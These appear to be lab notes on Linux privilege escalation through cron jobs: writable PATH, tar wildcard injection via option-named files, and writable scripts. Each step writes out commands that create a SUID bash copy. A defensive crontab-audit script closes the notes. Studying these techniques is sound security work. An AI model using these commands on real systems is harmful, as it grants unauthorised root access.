Scheduled tasks

Cron Path

Enumeration

  • We start by checking the crontab, for example with cat /etc/crontab. If we cannot read this file, we can still enumerate scheduled tasks in other ways, using the PayloadsAllTheThings documentation or an enumeration tool like LinPEAS.

  • So we can try to create a file named overwrite.sh and use it to escalate privileges.

Exploitation

  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh creates our overwrite file. The script will create a copy of bash with the SUID bit set.

  • chmod +x /home/user/overwrite.sh makes it executable.

Cron Wildcards

Enumeration

  • The scheduled script changes to the user's home directory, backs up its contents using a wildcard (*), and stores the backup in /tmp.

  • We cannot modify the script, so we need to abuse what the script itself does to get our privesc. Because the script uses tar, we can do this with tar's own options.

Exploitation

  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh creates a script that makes a SUID copy of bash.

  • touch /home/user/--checkpoint=1 creates a file whose name is a tar option. When the scheduled script expands the wildcard in the home directory, tar receives that file name as an argument and interprets it as an option. This option displays a status message every 1

  • touch /home/user/--checkpoint-action=exec=sh\ runme.sh creates a second file named as a tar option, which makes tar perform an action when the checkpoint we created before is hit.

  • After a minute we can launch our bash with /tmp/bash -p

Cron files overwrite

Enumeration

  • We locate the file using locate overwrite.sh

  • We can overwrite it

Exploitation

  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh appends to the file a command that will copy bash and give it SUID permissions.

  • After a minute we should be able to launch /tmp/bash -p
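
From the defender's side, the three weaknesses above (Cron Path, Cron Wildcards, Cron files overwrite) can be audited with one pass over the crontab. The script below is an added example, not part of the original notes; the function names, the TRUSTED_UID variable and the finding labels are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: defensive audit of a system crontab (m h dom mon dow user command).
# Run as root, e.g.: sh audit.sh /etc/crontab
TRUSTED_UID=${TRUSTED_UID:-0}   # assumption: only this uid should own cron files

# unsafe PATH: true if PATH is not owned by TRUSTED_UID or is group/world-writable
unsafe() {
    [ -n "$(find "$1" -prune \( ! -user "$TRUSTED_UID" -o -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# audit_crontab FILE: print one finding per line
audit_crontab() {
    cron_path=$(sed -n 's/^PATH=//p' "$1" | tail -n 1)
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" |
    while read -r m h dom mon dow user cmd rest; do
        script=$cmd
        case $cmd in
        */*) ;;                      # absolute or explicit path: no PATH search
        *)  script=; old_ifs=$IFS; IFS=:
            # Bare name: cron searches PATH left to right, so every directory
            # searched before the real script must be safe.
            for dir in $cron_path; do
                if unsafe "$dir"; then
                    echo "PATH_DIR_UNSAFE $dir (searched for $cmd)"
                fi
                if [ -x "$dir/$cmd" ]; then script=$dir/$cmd; break; fi
            done
            IFS=$old_ifs ;;
        esac
        [ -f "$script" ] || continue
        if unsafe "$script"; then echo "SCRIPT_UNSAFE $script"; fi
        # Heuristic: a bare * after tar lets file names starting with "-" be
        # parsed as options; archive ./* or the directory itself instead.
        if grep -Eq '(^|[;&|[:space:]])tar[[:space:]].*[[:space:]]\*' "$script"; then
            echo "TAR_WILDCARD $script"
        fi
    done
}

if [ "$#" -gt 0 ]; then audit_crontab "$1"; fi
```

Each finding maps to a fix: call cron scripts by absolute path from root-owned directories, remove group and world write permission from the scripts, and avoid bare wildcards in tar commands.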
